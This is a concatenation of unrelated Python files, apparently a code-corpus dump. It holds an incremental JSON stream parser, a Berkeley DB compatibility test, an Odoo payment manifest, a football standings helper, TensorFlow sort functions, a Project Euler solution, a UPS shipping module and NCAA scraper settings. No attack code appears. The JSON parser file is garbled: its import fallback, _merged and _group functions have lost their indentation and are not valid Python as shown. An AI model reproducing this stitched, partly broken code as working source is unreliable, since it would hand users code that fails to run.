# Copyright 2012-2014 Nigel Small
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Incremental JSON parser.
"""
from __future__ import unicode_literals
try:
from builtins import chr as _chr
except ImportError:
from __builtin__ import unichr as _chr
from itertools import groupby
from string import digits, whitespace
__all__ = ["JSONStream", "assembled", "grouped"]
class AwaitingData(BaseException):
    """Signals that the stream has no data available yet; the caller may
    retry once more input has been written.

    NOTE(review): subclasses BaseException rather than Exception,
    presumably so generic ``except Exception`` handlers don't swallow
    it -- confirm before changing.
    """

    def __init__(self, *args, **kwargs):
        super(AwaitingData, self).__init__(*args, **kwargs)
class EndOfStream(BaseException):
    """Signals that the stream is closed and fully consumed; no further
    data will ever arrive.

    NOTE(review): subclasses BaseException rather than Exception,
    presumably so generic ``except Exception`` handlers don't swallow
    it -- confirm before changing.
    """

    def __init__(self, *args, **kwargs):
        super(EndOfStream, self).__init__(*args, **kwargs)
class UnexpectedCharacter(ValueError):
    """Raised when the parser meets a character that is invalid at the
    current position in the JSON input."""

    def __init__(self, *args, **kwargs):
        super(UnexpectedCharacter, self).__init__(*args, **kwargs)
class TextStream:
    """A growable buffer of text chunks with incremental, resumable reads.

    Writers append chunks with write(); readers consume characters with
    peek()/read() and the bulk helpers below.  While the stream is still
    writable, running out of characters raises AwaitingData (retry after
    more data arrives); after close(), exhaustion raises EndOfStream.
    mark()/undo() save and restore the read cursor so a partial parse can
    be rolled back.
    """

    def __init__(self):
        # Chunks written so far ("lines" here means write chunks, not
        # newline-delimited lines); write() guarantees none is empty.
        self.__data = []
        # Read cursor: chunk index plus character offset in that chunk.
        self.__current_line = 0
        self.__current_char = 0
        # While True, exhaustion raises AwaitingData; after close(),
        # EndOfStream.
        self.__writable = True
        # Cursor position saved by mark() for undo().
        self.__marked_line = 0
        self.__marked_char = 0

    def close(self):
        # No more data will arrive; readers now see EndOfStream at the end.
        self.__writable = False

    def peek(self):
        # Return the next character without consuming it (may advance the
        # cursor across an exhausted chunk boundary).
        if self.__current_line < len(self.__data):
            line = self.__data[self.__current_line]
            if self.__current_char < len(line):
                return line[self.__current_char]
            else:
                # no more characters on this line, jump to the next
                self.__current_line += 1
                self.__current_char = 0
                if self.__current_line < len(self.__data):
                    return self.__data[self.__current_line][self.__current_char]
        if self.__writable:
            raise AwaitingData()
        else:
            raise EndOfStream()

    def read(self):
        # Consume and return the next character.
        if self.__current_line < len(self.__data):
            line = self.__data[self.__current_line]
            if self.__current_char < len(line):
                ch = line[self.__current_char]
                self.__current_char += 1
                return ch
            else:
                # Current chunk exhausted: step into the next one.
                self.__current_line += 1
                if self.__current_line < len(self.__data):
                    self.__current_char = 1
                    return self.__data[self.__current_line][0]
                else:
                    self.__current_char = 0
        if self.__writable:
            raise AwaitingData()
        else:
            raise EndOfStream()

    def read_any(self, allowed):
        # Consume the longest (possibly empty) run of characters drawn
        # from the *allowed* set and return it.
        out = []
        start = self.__current_char
        while True:
            if self.__current_line < len(self.__data):
                line = self.__data[self.__current_line]
                if self.__current_char < len(line):
                    ch = self.__data[self.__current_line][self.__current_char]
                    if ch in allowed:
                        # move forward
                        self.__current_char += 1
                    else:
                        # return everything between start and here
                        out.append(line[start:self.__current_char])
                        return "".join(out)
                else:
                    # no more characters on this line
                    out.append(line[start:])
                    self.__current_line += 1
                    self.__current_char = 0
                    start = 0
            elif self.__writable:
                raise AwaitingData()
            else:
                # Stream closed: whatever matched so far is the answer.
                return "".join(out)

    #def read_until(self, marker):
    # out = []
    # line = self.__current_line
    # start = self.__current_char
    # while True:
    # try:
    # end = self.__data[line].index(marker, start)
    # except IndexError: # no more lines
    # if self.__writable:
    # raise AwaitingData()
    # else:
    # raise EndOfStream()
    # except ValueError: # not found
    # out.append(self.__data[line][start:])
    # line += 1
    # start = 0
    # else:
    # # found
    # self.__current_line = line
    # self.__current_char = end + 1
    # out.append(self.__data[line][start:self.__current_char])
    # return "".join(out)

    def read_until_any(self, markers):
        # Consume up to and including the first occurrence of any one of
        # *markers*, returning everything consumed.  The cursor is only
        # committed once a marker is found, so AwaitingData leaves the
        # stream position untouched.
        out = []
        line = self.__current_line
        start = self.__current_char
        while True:
            if line < len(self.__data):
                try:
                    # Nearest marker position in this chunk; min() raises
                    # ValueError when no marker occurs at all.
                    end = min(pos
                              for pos in [self.__data[line].find(marker, start)
                                          for marker in markers]
                              if pos >= 0)
                except ValueError:  # not found
                    out.append(self.__data[line][start:])
                    line += 1
                    start = 0
                else:
                    # found
                    self.__current_line = line
                    self.__current_char = end + 1
                    out.append(self.__data[line][start:self.__current_char])
                    return "".join(out)
            elif self.__writable:
                raise AwaitingData()
            else:
                raise EndOfStream()

    def peek_after_any(self, markers):
        """
        Skip any characters in the marker set and return a peek of the
        first character that follows them (without consuming it).
        """
        while True:
            if self.__current_line < len(self.__data):
                line = self.__data[self.__current_line]
                if self.__current_char < len(line):
                    ch = self.__data[self.__current_line][self.__current_char]
                    if ch in markers:
                        # skip
                        self.__current_char += 1
                    else:
                        # peek
                        return ch
                else:
                    # no more characters on this line
                    self.__current_line += 1
                    self.__current_char = 0
            elif self.__writable:
                raise AwaitingData()
            else:
                raise EndOfStream()

    def write(self, data):
        # Append a chunk of raw text for readers to consume.
        if not self.__writable:
            raise IOError("Stream is not writable")
        if data:
            # so we can guarantee no line is empty
            self.__data.append(data)

    def mark(self):
        # Remember the current cursor so undo() can roll back to it.
        self.__marked_line = self.__current_line
        self.__marked_char = self.__current_char

    def undo(self):
        # Roll the cursor back to the last mark() position.
        self.__current_line = self.__marked_line
        self.__current_char = self.__marked_char
class Tokeniser(object):
    """Incremental JSON lexer.

    Raw JSON text is fed in with write() and lexical tokens are pulled out
    with read_token().  Reading raises AwaitingData when the current token
    is incomplete and more input may still arrive, or EndOfStream once the
    underlying stream has been closed and fully consumed.
    """
    def __init__(self):
        # Buffered, markable character stream holding the raw JSON text.
        self.__text = TextStream()
    def close(self):
        # Seal the stream: incomplete reads now raise EndOfStream
        # instead of AwaitingData.
        self.__text.close()
    def write(self, data):
        """Write raw JSON data to the decoder stream.
        """
        self.__text.write(data)
    def _read_literal(self, literal):
        """Consume exactly the characters of *literal*, raising
        UnexpectedCharacter on the first mismatch.  Rewinds on AwaitingData
        so the read can be retried when more data arrives.
        """
        self.__text.mark()
        try:
            for expected in literal:
                actual = self.__text.read()
                if actual != expected:
                    raise UnexpectedCharacter(actual)
        except AwaitingData:
            self.__text.undo()
            raise
        return literal
    def _read_string(self):
        """Consume a JSON string token.

        Returns a (source, value) pair: the raw source text including the
        surrounding quotes, and the decoded value with escapes resolved.

        NOTE(review): the nested _read_literal() call re-mark()s the
        stream, overwriting the mark set here; after AwaitingData the
        undo() below may therefore rewind only to the inner mark rather
        than to the start of the token -- confirm whether TextStream is
        expected to support nested marks.
        """
        self.__text.mark()
        try:
            src, value = [self._read_literal('"')], []
            while True:
                chunk = self.__text.read_until_any(('"', '\\'))
                src.append(chunk)
                # Strip the terminating marker (closing quote or backslash).
                value.append(chunk[:-1])
                if chunk.endswith('\\'):
                    # Escape sequence: decode the character(s) that follow.
                    ch = self.__text.read()
                    src.append(ch)
                    if ch in '"/\\':
                        value.append(ch)
                    elif ch == 'b':
                        value.append('\b')
                    elif ch == 'f':
                        value.append('\f')
                    elif ch == 'n':
                        value.append('\n')
                    elif ch == 'r':
                        value.append('\r')
                    elif ch == 't':
                        value.append('\t')
                    elif ch == 'u':
                        # \uXXXX: accumulate four hex digits into a code point.
                        n = 0
                        for i in range(4):
                            ch = self.__text.read()
                            src.append(ch)
                            n = 16 * n + int(ch, 16)
                        value.append(_chr(n))
                    else:
                        raise UnexpectedCharacter(ch)
                else:
                    # Chunk ended with the closing quote: token complete.
                    return "".join(src), "".join(value)
        except AwaitingData:
            self.__text.undo()
            raise
    def _read_number(self):
        """Consume a JSON number token.

        Returns a (source, value) pair where value is an int, or a float
        when a fractional part or an exponent is present.
        """
        src = []
        has_fractional_part = False
        has_exponent = False
        self.__text.mark()
        try:
            # check for sign
            ch = self.__text.read_any("-")
            if ch:
                src.append(ch)
            # read integer part
            src.append(self.__text.read_any(digits))
            # read fractional part
            ch = self.__text.read_any(".")
            if ch:
                has_fractional_part = True
                src.append(ch)
                src.append(self.__text.read_any(digits))
            # read exponent
            ch = self.__text.read_any('Ee')
            if ch:
                has_exponent = True
                src.append(ch)
                ch = self.__text.read_any('+-')
                if ch:
                    src.append(ch)
                src.append(self.__text.read_any(digits))
        except AwaitingData:
            # number potentially incomplete: need to wait for
            # further data or end of stream
            self.__text.undo()
            raise
        str_src = "".join(src)
        if has_fractional_part or has_exponent:
            return str_src, float(str_src)
        else:
            return str_src, int(str_src)
    def read_token(self):
        """ Read token

        Skips leading whitespace, then returns a (source, value) pair for
        the next token: punctuation yields (char, None); strings and
        numbers yield their decoded value; the true/false/null literals
        yield True/False/None.
        """
        ch = self.__text.peek_after_any(whitespace)
        if ch in ',:[]{}':
            return self.__text.read(), None
        if ch == '"':
            return self._read_string()
        if ch in '0123456789+-':
            return self._read_number()
        if ch == 't':
            return self._read_literal("true"), True
        if ch == 'f':
            return self._read_literal("false"), False
        if ch == 'n':
            return self._read_literal("null"), None
        raise UnexpectedCharacter(ch)
# Token constants used for expectation management
# Bit flags describing which token kinds are acceptable next.
VALUE = 0x01
OPEN_BRACKET = 0x02
CLOSE_BRACKET = 0x04
OPEN_BRACE = 0x08
CLOSE_BRACE = 0x10
COMMA = 0x20
COLON = 0x40
# Common flag combinations used by the JSONStream state machine.
VALUE_OR_OPEN = VALUE | OPEN_BRACKET | OPEN_BRACE
VALUE_BRACKET_OR_OPEN_BRACE = VALUE | OPEN_BRACKET | CLOSE_BRACKET | OPEN_BRACE
COMMA_OR_CLOSE_BRACKET = COMMA | CLOSE_BRACKET
COMMA_OR_CLOSE_BRACE = COMMA | CLOSE_BRACE
VALUE_OR_CLOSE_BRACE = VALUE | CLOSE_BRACE
class JSONStream(object):
    """ Streaming JSON decoder. This class both expects Unicode input and will
    produce Unicode output.

    Iterating over an instance yields (path, value) pairs as the document
    is decoded incrementally:

    - *path* is a tuple locating the value within the document, with int
      items for array indexes and string items for object keys;
    - *value* is the decoded scalar, or an empty list/dict placeholder
      announcing a newly opened array/object.
    """
    def __init__(self, source):
        # source: iterable of raw JSON text chunks.
        self.tokeniser = Tokeniser()
        self.source = iter(source)
        # Path components addressing the value currently being decoded.
        self.path = []
        # Bit mask of token kinds acceptable at this point.
        self._expectation = VALUE_OR_OPEN
    def _in_array(self):
        # An int path tail means we are positioned inside a JSON array.
        return self.path and isinstance(self.path[-1], int)
    def _in_object(self):
        # A non-int path tail means we are positioned inside a JSON object.
        return self.path and not isinstance(self.path[-1], int)
    def __iter__(self):
        while True:
            try:
                try:
                    # Feed the next chunk of raw text to the tokeniser.
                    self.tokeniser.write(next(self.source))
                except StopIteration:
                    # No more input: seal the stream so incomplete tokens
                    # raise EndOfStream instead of AwaitingData.
                    self.tokeniser.close()
                while True:
                    try:
                        src, value = self.tokeniser.read_token()
                        if src == ',':
                            if not self._expectation & COMMA:
                                raise UnexpectedCharacter(",")
                            self._expectation = VALUE_OR_OPEN
                        elif src == ':':
                            if not self._expectation & COLON:
                                raise UnexpectedCharacter(":")
                            self._expectation = VALUE_OR_OPEN
                        elif src == '[':
                            # Validate before announcing the new array so a
                            # malformed document cannot emit a spurious
                            # event ahead of the UnexpectedCharacter.
                            if not self._expectation & OPEN_BRACKET:
                                raise UnexpectedCharacter("[")
                            yield tuple(self.path), []
                            self.path.append(0)
                            self._expectation = VALUE_BRACKET_OR_OPEN_BRACE
                        elif src == ']':
                            if not self._expectation & CLOSE_BRACKET:
                                raise UnexpectedCharacter("]")
                            self.path.pop()
                            if self._in_array():
                                # Advance the index in the enclosing array.
                                self.path[-1] += 1
                                self._expectation = COMMA_OR_CLOSE_BRACKET
                            elif self._in_object():
                                # Value consumed: expect the next key.
                                self.path[-1] = None
                                self._expectation = COMMA_OR_CLOSE_BRACE
                            else:
                                self._expectation = VALUE_OR_OPEN
                        elif src == '{':
                            # Validate before announcing the new object
                            # (see the '[' branch above).
                            if not self._expectation & OPEN_BRACE:
                                raise UnexpectedCharacter("{")
                            yield tuple(self.path), {}
                            self.path.append(None)
                            self._expectation = VALUE_OR_CLOSE_BRACE
                        elif src == '}':
                            if not self._expectation & CLOSE_BRACE:
                                raise UnexpectedCharacter("}")
                            self.path.pop()
                            if self._in_array():
                                self.path[-1] += 1
                                self._expectation = COMMA_OR_CLOSE_BRACKET
                            elif self._in_object():
                                self.path[-1] = None
                                self._expectation = COMMA_OR_CLOSE_BRACE
                            else:
                                self._expectation = VALUE_OR_OPEN
                        else:
                            if not self._expectation & VALUE:
                                raise UnexpectedCharacter(src)
                            if self._in_array():
                                # array value
                                yield tuple(self.path), value
                                self.path[-1] += 1
                                self._expectation = COMMA_OR_CLOSE_BRACKET
                            elif self._in_object():
                                if self.path[-1] is None:
                                    # object key (no yield)
                                    self.path[-1] = value
                                    self._expectation = COLON
                                else:
                                    # object value
                                    yield tuple(self.path), value
                                    self.path[-1] = None
                                    self._expectation = COMMA_OR_CLOSE_BRACE
                            else:
                                # simple value
                                yield tuple(self.path), value
                    except AwaitingData:
                        # Need more input: break out to fetch another chunk.
                        break
            except EndOfStream:
                # Input exhausted and fully tokenised: iteration is done.
                break
def _merged(obj, key, value):
""" Returns object with value merged at a position described by iterable
key. The key describes a navigable path through the object hierarchy with
integer items describing list indexes and other types of items describing
dictionary keys.
>>> obj = None
>>> obj = _merged(obj, ("drink",), "lemonade")
>>> obj
{'drink': 'lemonade'}
>>> obj = _merged(obj, ("cutlery", 0), "knife")
>>> obj = _merged(obj, ("cutlery", 1), "fork")
>>> obj = _merged(obj, ("cutlery", 2), "spoon")
>>> obj
{'cutlery': ['knife', 'fork', 'spoon'], 'drink': 'lemonade'}
"""
if key:
k = key[0]
if isinstance(k, int):
if isinstance(obj, list):
obj = list(obj)
else:
obj = []
while len(obj) <= k:
obj.append(None)
else:
if isinstance(obj, dict):
obj = dict(obj)
else:
obj = {}
obj.setdefault(k, None)
obj[k] = _merged(obj[k], key[1:], value)
return obj
else:
return value
def assembled(iterable):
    """ Builds and returns a JSON-derived value from the (path, value) pairs
    emitted by the JSONStream process, analogous to the built-in `dict`
    constructor. Each pair is folded into the result with `_merged`.

    >>> data = [
    ...     (("drink",), "lemonade"),
    ...     (("cutlery", 0), "knife"),
    ...     (("cutlery", 1), "fork"),
    ...     (("cutlery", 2), "spoon"),
    ... ]
    >>> assembled(data)
    {'drink': 'lemonade', 'cutlery': ['knife', 'fork', 'spoon']}

    :param iterable: key-value pairs to be merged into assembled value
    """
    result = None
    for path, item in iterable:
        result = _merged(result, path, item)
    return result
def _group(iterable, level):
for key, value in iterable:
yield key[level:], value
def grouped(iterable, level=1):
    """Group (key, value) pairs by the first *level* components of each key.

    Yields (prefix, pairs) tuples, where *pairs* iterates the matching
    items with the shared prefix stripped from their keys.  Items whose
    keys are shorter than *level* are discarded.
    """
    def prefix_of(item):
        path = item[0]
        return path[:level] if len(path) >= level else None

    for prefix, items in groupby(iterable, prefix_of):
        if prefix is not None:
            yield prefix, _group(items, level)
|
fkolacek/FIT-VUT | refs/heads/master | bp-revok/python/lib/python2.7/bsddb/test/test_compat.py | 5 | """
Test cases adapted from the test_bsddb.py module in Python's
regression test suite.
"""
import os, string
import unittest
from test_all import db, hashopen, btopen, rnopen, verbose, \
get_new_database_path
class CompatibilityTestCase(unittest.TestCase):
    """Exercise the legacy bsddb-style btopen/hashopen/rnopen interfaces.

    Adapted from Python's regression test suite to run against the
    bsddb compatibility layer.  (Python 2 source.)
    """
    def setUp(self):
        # A fresh database file path for every test.
        self.filename = get_new_database_path()
    def tearDown(self):
        # Best-effort cleanup of the database file.
        try:
            os.remove(self.filename)
        except os.error:
            pass
    def test01_btopen(self):
        self.do_bthash_test(btopen, 'btopen')
    def test02_hashopen(self):
        self.do_bthash_test(hashopen, 'hashopen')
    def test03_rnopen(self):
        data = "The quick brown fox jumped over the lazy dog.".split()
        if verbose:
            print "\nTesting: rnopen"
        f = rnopen(self.filename, 'c')
        # Recno databases use 1-based integer keys.
        for x in range(len(data)):
            f[x+1] = data[x]
        getTest = (f[1], f[2], f[3])
        if verbose:
            print '%s %s %s' % getTest
        self.assertEqual(getTest[1], 'quick', 'data mismatch!')
        rv = f.set_location(3)
        if rv != (3, 'brown'):
            self.fail('recno database set_location failed: '+repr(rv))
        f[25] = 'twenty-five'
        f.close()
        del f
        f = rnopen(self.filename, 'w')
        f[20] = 'twenty'
        # Missing integer keys raise KeyError; non-integer keys TypeError.
        def noRec(f):
            rec = f[15]
        self.assertRaises(KeyError, noRec, f)
        def badKey(f):
            rec = f['a string']
        self.assertRaises(TypeError, badKey, f)
        del f[3]
        # Iterate from the first record until next() runs off the end.
        rec = f.first()
        while rec:
            if verbose:
                print rec
            try:
                rec = f.next()
            except KeyError:
                break
        f.close()
    def test04_n_flag(self):
        # 'n' creates a new, truncated database.
        f = hashopen(self.filename, 'n')
        f.close()
    def do_bthash_test(self, factory, what):
        # Shared behavioural checks for the btree and hash interfaces.
        if verbose:
            print '\nTesting: ', what
        f = factory(self.filename, 'c')
        if verbose:
            print 'creation...'
        # truth test
        if f:
            if verbose: print "truth test: true"
        else:
            if verbose: print "truth test: false"
        f['0'] = ''
        f['a'] = 'Guido'
        f['b'] = 'van'
        f['c'] = 'Rossum'
        f['d'] = 'invented'
        # 'e' intentionally left out
        f['f'] = 'Python'
        if verbose:
            print '%s %s %s' % (f['a'], f['b'], f['c'])
        if verbose:
            print 'key ordering...'
        start = f.set_location(f.first()[0])
        if start != ('0', ''):
            self.fail("incorrect first() result: "+repr(start))
        # Walk forward until next() raises, then verify we stopped at last().
        while 1:
            try:
                rec = f.next()
            except KeyError:
                self.assertEqual(rec, f.last(), 'Error, last <> last!')
                f.previous()
                break
            if verbose:
                print rec
        self.assert_(f.has_key('f'), 'Error, missing key!')
        # test that set_location() returns the next nearest key, value
        # on btree databases and raises KeyError on others.
        if factory == btopen:
            e = f.set_location('e')
            if e != ('f', 'Python'):
                self.fail('wrong key,value returned: '+repr(e))
        else:
            try:
                e = f.set_location('e')
            except KeyError:
                pass
            else:
                self.fail("set_location on non-existent key did not raise KeyError")
        f.sync()
        f.close()
        # truth test
        # A closed handle must refuse truth testing with DBError.
        try:
            if f:
                if verbose: print "truth test: true"
            else:
                if verbose: print "truth test: false"
        except db.DBError:
            pass
        else:
            self.fail("Exception expected")
        del f
        if verbose:
            print 'modification...'
        f = factory(self.filename, 'w')
        f['d'] = 'discovered'
        if verbose:
            print 'access...'
        for key in f.keys():
            word = f[key]
            if verbose:
                print word
        # Missing string keys raise KeyError; non-string keys TypeError.
        def noRec(f):
            rec = f['no such key']
        self.assertRaises(KeyError, noRec, f)
        def badKey(f):
            rec = f[15]
        self.assertRaises(TypeError, badKey, f)
        f.close()
#----------------------------------------------------------------------
def test_suite():
    """Build the suite of all CompatibilityTestCase tests.

    Uses unittest.TestLoader instead of the deprecated unittest.makeSuite
    helper (removed in Python 3.13); both are available on Python 2.
    """
    return unittest.TestLoader().loadTestsFromTestCase(CompatibilityTestCase)
# Allow running this test module directly as a script.
if __name__ == '__main__':
    unittest.main(defaultTest='test_suite')
|
factorlibre/l10n-spain | refs/heads/8.0 | payment_redsys/__openerp__.py | 10 | # -*- coding: utf-8 -*-
# Odoo addon manifest for the Redsys payment acquirer.
{
    'name': 'Redsys Payment Acquirer',
    'category': 'Hidden',
    'summary': 'Payment Acquirer: Redsys Implementation',
    'version': '8.0.1.0.2',
    'author': "Incaser Informatica S.L.,Odoo Community Association (OCA)",
    'depends': ['payment'],
    # External Python dependency: pycrypto's DES3 cipher must be importable.
    "external_dependencies": {
        "python": [
            "Crypto.Cipher.DES3",
        ],
        "bin": [],
    },
    'data': [
        'views/redsys.xml',
        'views/payment_acquirer.xml'
    ],
    'license': 'AGPL-3',
    'installable': True,
}
|
marquirj/ProyectoSkull | refs/heads/master | bot/contenedores.py | 1 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
equiposPuntos = [("Chiclana C.F", 25), ("Trebujena C.F", 25), ("Jerez Industrial C.F.", 21), ("Bazan", 20), ("Balon de Cadiz", 20), ("U.D. Villamartin", 17), ("C.D. Vejer", 15), ("Portuense C.F.", 14), ("SanFer Isleño", 14), ("Roteña", 12), ("U.D. Tesorillo", 12), ("Juventud Sanluqueña", 11), ("Rayo Sanluqueño C.D.", 10), ("Jedula C.D.", 8), ("C.D. Guadiaro", 6), ("Chipiona", 3), ("El Torno 2009", 6), ("San Jose Obrero U.D.", 5)]
def getClasificacion():
    """Return the league table ordered by points, highest first.

    Sorts the module-level ``equiposPuntos`` list in place and returns
    that same list object.
    """
    equiposPuntos.sort(key=lambda entrada: entrada[1], reverse=True)
    return equiposPuntos
|
jalexvig/tensorflow | refs/heads/master | tensorflow/contrib/framework/python/ops/sort_ops.py | 27 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Support for sorting tensors.
@@argsort
@@sort
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops as framework_ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
def sort(values, axis=-1, direction='ASCENDING', name=None):
  """Sorts a tensor along the given axis.

  Args:
    values: 1-D or higher numeric `Tensor`.
    axis: The axis along which to sort. Defaults to -1, the last axis.
    direction: Sort order, either `'ASCENDING'` or `'DESCENDING'`.
    name: Optional name for the operation.

  Returns:
    A `Tensor` with the same dtype and shape as `values`, with its elements
    sorted along `axis`.

  Raises:
    ValueError: If axis is not a constant scalar, or the direction is invalid.
  """
  with framework_ops.name_scope(name, 'sort'):
    return _sort_or_argsort(values, axis, direction, return_argsort=False)
def argsort(values, axis=-1, direction='ASCENDING', stable=False, name=None):
  """Returns the indices that would sort a tensor along an axis.

  For a 1D tensor, `tf.gather(values, tf.argsort(values))` is equivalent to
  `tf.sort(values)`. For higher dimensions the output has the same shape as
  `values`; along `axis` each element is the index of the sorted element in
  that slice of the tensor at the given position.

  Args:
    values: 1-D or higher numeric `Tensor`.
    axis: The axis along which to sort. Defaults to -1, the last axis.
    direction: Sort order, either `'ASCENDING'` or `'DESCENDING'`.
    stable: If True, equal elements in the original tensor will not be
      re-ordered in the returned order. Unstable sort is not yet implemented,
      but will eventually be the default for performance reasons. If you
      require a stable order, pass `stable=True` for forwards compatibility.
    name: Optional name for the operation.

  Returns:
    An int32 `Tensor` with the same shape as `values`, holding the indices
    that would sort each slice of `values` along `axis`.

  Raises:
    ValueError: If axis is not a constant scalar, or the direction is invalid.
  """
  del stable  # Unused: the current implementation is always stable.
  with framework_ops.name_scope(name, 'argsort'):
    return _sort_or_argsort(values, axis, direction, return_argsort=True)
def _sort_or_argsort(values, axis, direction, return_argsort):
  """Internal sort/argsort implementation.

  Args:
    values: The input values.
    axis: The axis along which to sort.
    direction: 'ASCENDING' or 'DESCENDING'.
    return_argsort: Whether to return the argsort result instead of the
      sorted values.

  Returns:
    Either the sorted values, or the indices of the sorted values in the
    original tensor. See the `sort` and `argsort` docstrings.

  Raises:
    ValueError: If axis is not a constant scalar, or the direction is invalid.
  """
  if direction not in _SORT_IMPL:
    valid = ', '.join(sorted(_SORT_IMPL.keys()))
    raise ValueError('%s should be one of %s' % (direction, valid))
  # Axis must be a statically-known integer, not a Tensor.
  axis = framework_ops.convert_to_tensor(axis, name='axis')
  static_axis = tensor_util.constant_value(axis)
  if axis.shape.ndims != 0 or static_axis is None:
    raise ValueError('axis must be a constant scalar')
  static_axis = int(static_axis)  # Avoids NumPy casting error
  values = framework_ops.convert_to_tensor(values, name='values')
  return _SORT_IMPL[direction](values, static_axis, return_argsort)
def _descending_sort(values, axis, return_argsort=False):
  """Sorts values in reverse using `top_k`.

  Because `top_k` only operates on the last axis, any other axis is first
  swapped with the last one via a transposition that is its own inverse.

  Args:
    values: Tensor of numeric values.
    axis: Index of the axis which values should be sorted along.
    return_argsort: If False, return the sorted values. If True, return the
      indices that would sort the values.

  Returns:
    The sorted values.
  """
  k = array_ops.shape(values)[axis]
  rank = array_ops.rank(values)
  # static_rank is None when the rank is not known at graph-build time.
  static_rank = values.shape.ndims
  # Fast path: sorting the last axis.
  if axis == -1 or axis + 1 == values.get_shape().ndims:
    top_k_input = values
    transposition = None
  else:
    # Otherwise, transpose the array. Swap axes `axis` and `rank - 1`.
    if axis < 0:
      # Calculate the actual axis index if counting from the end. Use the static
      # rank if available, or else make the axis back into a tensor.
      axis += static_rank or rank
    if static_rank is not None:
      # Prefer to calculate the transposition array in NumPy and make it a
      # constant.
      transposition = constant_op.constant(
          np.r_[
              # Axes up to axis are unchanged.
              np.arange(axis),
              # Swap axis and rank - 1.
              [static_rank - 1],
              # Axes in [axis + 1, rank - 1) are unchanged.
              np.arange(axis + 1, static_rank - 1),
              # Swap axis and rank - 1.
              [axis]],
          name='transposition')
    else:
      # Generate the transposition array from the tensors.
      transposition = array_ops.concat(
          [
              # Axes up to axis are unchanged.
              math_ops.range(axis),
              # Swap axis and rank - 1.
              [rank - 1],
              # Axes in [axis + 1, rank - 1) are unchanged.
              math_ops.range(axis + 1, rank - 1),
              # Swap axis and rank - 1.
              [axis]
          ],
          axis=0)
    top_k_input = array_ops.transpose(values, transposition)
  values, indices = nn_ops.top_k(top_k_input, k)
  return_value = indices if return_argsort else values
  if transposition is not None:
    # transposition contains a single cycle of length 2 (swapping 2 elements),
    # so it is an involution (it is its own inverse).
    return_value = array_ops.transpose(return_value, transposition)
  return return_value
def _ascending_sort(values, axis, return_argsort=False):
  """Sorts ascending by descending-sorting the negated values."""
  result = _descending_sort(-values, axis, return_argsort)
  if return_argsort:
    # Indices computed on -values are already valid for the original tensor.
    return result
  # Negate again to recover the original values, now in ascending order.
  return -result
# Dispatch table mapping a direction string to its sort implementation.
_SORT_IMPL = {
    'ASCENDING': _ascending_sort,
    'DESCENDING': _descending_sort,
}
|
drcsturm/project-euler | refs/heads/master | p033.py | 1 |
# Project Euler problem 33: digit-cancelling fractions.
#
# The fraction 49/98 is curious: an inexperienced mathematician simplifying
# it may incorrectly believe 49/98 = 4/8 (which happens to be correct) is
# obtained by cancelling the 9s.  Trivial cases such as 30/50 = 3/5 are
# excluded.  There are exactly four non-trivial fractions of this kind,
# less than one in value, with two-digit numerator and denominator.
# Find the denominator of their product in lowest common terms.
ans = 1
for denom in range(10, 100):
    # Skip trivial candidates: multiples of 10 and repdigits (11, 22, ...).
    if denom % 10 == 0 or denom % 11 == 0:
        continue
    for numer in range(10, denom):
        if numer % 10 == 0 or numer % 11 == 0:
            continue
        s_denom = str(denom)
        s_numer = str(numer)
        for digit in s_numer:
            if s_denom.count(digit) == 1:
                # Cancel the shared digit from both parts and compare values.
                cancelled_denom = int(s_denom.replace(digit, ''))
                cancelled_numer = int(s_numer.replace(digit, ''))
                if numer / denom == cancelled_numer / cancelled_denom:
                    ans *= cancelled_denom / cancelled_numer
print(ans)
|
sankroh/satchmo | refs/heads/master | satchmo/shipping/modules/ups/__init__.py | 2 | import shipper
from satchmo.configuration import config_choice_values
def get_methods():
    """Return a list of Shipper instances, one per configured UPS service type."""
    choices = config_choice_values('satchmo.shipping.modules.ups',
                                   'UPS_SHIPPING_CHOICES')
    return [shipper.Shipper(service_type=choice) for choice in choices]
|
Aintno63/NCAA-playoff | refs/heads/master | scraper_Ncaa_settings.py | 1 | #!/usr/bin/python
##############################################################
# Program name: NCAA FOOTBALL Stats Scraper (Settings file)
# Version: 1.0
# By: Sean Middleton
# License: MPL 2.0 (see LICENSE file in root folder)
# Additional thanks:
# Refer to http://stats.ncaa.org/team/inst_team_list?sport_code=MBB&division=1 in setting these variables
##############################################################
# Select year for parsing
# Select year for parsing
# NOTE(review): the [2014, 11540] pair used below does not appear in the
# documented mappings (which only list 2010-2013); confirm the index is
# correct for the 2013-2014 season.
academic_year = "2014" # Set the academic year (2012 refers to 2011-2012 season). As of writing, this can range from 2010 to 2013.
year_index = "11540" # Set the index that maps to the academic year. This may be obtained from looking at the team URLs on the list of available teams, for the given academic year. As of writing, the [academic_year, year_index] mappings are: [2013, 11220], [2012, 10740], [2011, 10440], and [2010, 10260]
# What do you want to do? (Note: Lower tiers need higher tiers, i.e., ind_game_stats requires map_players (Tier 2), which requires map_teams (Tier 1).)
map_teams = 1 # Create a team mapping (0 = no, 1 = yes) -- TIER 1
map_schedule = 1 # Create schedule mapping (0 = no, 1 = yes)
map_players = 1 # Create a player mapping (0 = no, 1 = yes)
summary_teams = 1 # Get summary statistics for each team (0 = no, 1 = yes)
summary_players = 1 # Get summary statistics for each player (0 = no, 1 = yes)
ind_game_stats = 1 # Get individual game statistics (0 = no, 1 = yes)
ind_player_stats = 1 # Get individual player statistics (0 = no, 1 = yes)
